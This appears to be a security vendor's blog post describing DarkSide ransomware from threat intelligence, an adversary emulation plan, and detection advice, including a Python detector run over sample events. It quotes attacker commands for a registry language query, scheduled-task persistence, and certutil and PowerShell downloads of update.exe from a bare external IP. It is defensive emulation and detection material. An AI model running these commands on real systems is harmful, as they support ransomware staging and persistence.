In this blog we consume Cyber Threat Intelligence to understand how the DarkSide ransomware behaves, we create and share an adversary emulation plan so you can quickly test, measure, and improve your people, process, and technology for similar attacks, and we discuss how to detect and respond to DarkSide ransomware.
Cyber Threat Intelligence
The DarkSide ransomware has been in use for 9-10 months per Catalin Cimpanu, which gives us a good foundation of Cyber Threat Intelligence (CTI). This adversary emulation plan is based on Cybereason’s intel from April 2021. We see that DarkSide has evolved like Maze, Ryuk and Egregor to perform double extortion. Double extortion is when the threat group steals files from the victim to post on their website in order to pressure the victim into paying, in addition to encrypting all the files and only offering to unlock them after payment is received.
According to DarkTracer: DarkWeb Criminal Intelligence, DarkSide has attacked 3 other Oil and Gas companies since November 2020.
From the CTI, there are a few things that stand out and that we should test our organization for:
Command and Control was observed as HTTP (clear text) instead of HTTPS
Downloading the malware was directly to a “naked IP” not a domain name as most people would use to navigate to a website
PowerShell.exe and Certutil for downloading and executing the ransomware
Checking the operating system language before performing ransomware TTPs
Ensure you have the HTTP relay installed on your SCYTHE server or on a different host and redirecting to your SCYTHE server. Create a new SCYTHE campaign as you would normally do but select HTTP as the communication method. Ensure the parameters are correct for your relay configuration. The Cyber Threat Intelligence shows that “naked IPs” were used so you may want to set the parameters to an IP address instead of a domain name.
In the automation steps screen, import from existing threats: DarkSide. Here are a few steps from the plan we want to call out:
The DarkSide ransomware checks the operating system language before executing the ransomware. In Step 2 of the plan, we do the same, checking for the English language: reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Nls\Language
Step 3 then decides whether to continue executing based on the language.
Step 9 creates a new Scheduled Task named how the Cyber Threat Intelligence informed us: SCHTASKS /CREATE /SC DAILY /TN "MyTasks\Task1" /TR "C:\update.exe" /ST 11:00 /F
Step 17 performs data staging and step 18 does exfiltration through the C2 channel
Step 19 then encrypts the data and erases the original
Step 22 checks whether your payload is running with local administrator privileges and, if so, executes powershell Get-WmiObject Win32_Shadowcopy
Steps 25 and 26 clean up to leave the system how we found it.
According to the Cyber Threat Intelligence, the threat actor leveraged PowerShell.exe and CertUtil.exe to download and then execute the ransomware.
In an attempt to not sound like a broken record, we will focus on what is different about detecting and responding to this ransomware. As usual, making daily backups and restoring from them will get you back up and running as quickly as possible when the inevitable happens. However, you can detect and respond much earlier by building detection for these TTPs:
Detect and alert when the registry key for the default language of the operating system is queried; this is an early indicator.
Detect and alert when powershell.exe or certutil.exe goes out to the Internet to retrieve any file.
Detect and alert on any outbound connections to a “naked IP” address. Humans generally do not type these out. I have seen companies completely prevent this access with their web proxies.
Alert when a new scheduled task is created.
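As an added example (not code from the original post or from SCYTHE), the four detections above run over constructed Sysmon-style process-creation and network-connection events; the event field names and the 203.0.113.10 address are assumptions made for this illustration:

```python
import ipaddress
import re
from urllib.parse import urlparse

# Constructed sample telemetry shaped like Sysmon process-create (id 1) and network (id 3) events; field names are assumed.
SAMPLE_EVENTS = [
    {"id": 1, "image": r"C:\Windows\System32\reg.exe",
     "cmd": r"reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Nls\Language"},
    {"id": 1, "image": r"C:\Windows\System32\certutil.exe",
     "cmd": r"certutil -urlcache -split -f http://203.0.113.10/update.exe C:\update.exe"},
    {"id": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r"powershell -c Invoke-WebRequest http://203.0.113.10/update.exe -OutFile C:\update.exe"},
    {"id": 3, "image": r"C:\Windows\System32\certutil.exe", "dst_host": "203.0.113.10", "dst_port": 80},
    {"id": 1, "image": r"C:\Windows\System32\schtasks.exe",
     "cmd": r'SCHTASKS /CREATE /SC DAILY /TN "MyTasks\Task1" /TR "C:\update.exe" /ST 11:00 /F'},
    {"id": 1, "image": r"C:\Windows\System32\notepad.exe", "cmd": r"notepad C:\notes.txt"},
    {"id": 3, "image": r"C:\Program Files\Browser\browser.exe", "dst_host": "www.example.com", "dst_port": 443},
]

LANGUAGE_KEY = r"\SYSTEM\CurrentControlSet\Control\Nls\Language"
DOWNLOADERS = ("powershell.exe", "certutil.exe")
URL_RE = re.compile(r"https?://[^\s'\"]+", re.IGNORECASE)
# RFC 1918 and loopback ranges count as internal so that east-west traffic does not alert.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]


def is_naked_external_ip(host):
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return False  # a DNS name, which is what human-driven browsing normally uses
    return not any(addr in net for net in INTERNAL_NETS)


def classify(event):
    """Return the DarkSide TTP labels an event matches; an empty list means no alert."""
    hits = []
    image = event["image"].rsplit("\\", 1)[-1].lower()
    cmd = event.get("cmd", "")
    if event["id"] == 1:
        if image == "reg.exe" and LANGUAGE_KEY.lower() in cmd.lower():
            hits.append("os_language_query")        # early indicator, step 2 of the plan
        if image in DOWNLOADERS:
            for url in URL_RE.findall(cmd):
                hits.append("lolbin_download")      # powershell/certutil fetching a file
                if is_naked_external_ip(urlparse(url).hostname or ""):
                    hits.append("naked_ip_url")
        if image == "schtasks.exe" and "/create" in cmd.lower():
            hits.append("scheduled_task_created")   # step 9 of the plan
    elif event["id"] == 3 and is_naked_external_ip(event["dst_host"]):
        hits.append("outbound_naked_ip")            # C2 or download to a bare IP
    return hits
```

Running classify over each event in SAMPLE_EVENTS flags the five DarkSide-style events and leaves the notepad and browser events silent.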
We can no longer dismiss ransomware as an annoying attack that affects everyone but us. No company is immune to these attacks and therefore needs to be prepared. In this post we leveraged Cyber Threat Intelligence from Cybereason to understand how this adversary behaves, we created and shared an adversary emulation plan so you can quickly test, measure, and improve your people, process, and technology against similar attacks, and we discussed how to detect and respond to DarkSide ransomware.
This Threat Thursday post discusses active research by SCYTHE and other cited third parties into an ongoing threat. The information in this post should be considered preliminary and may be updated as research continues. This information is provided “as-is” without any warranty or condition of any kind, either express or implied.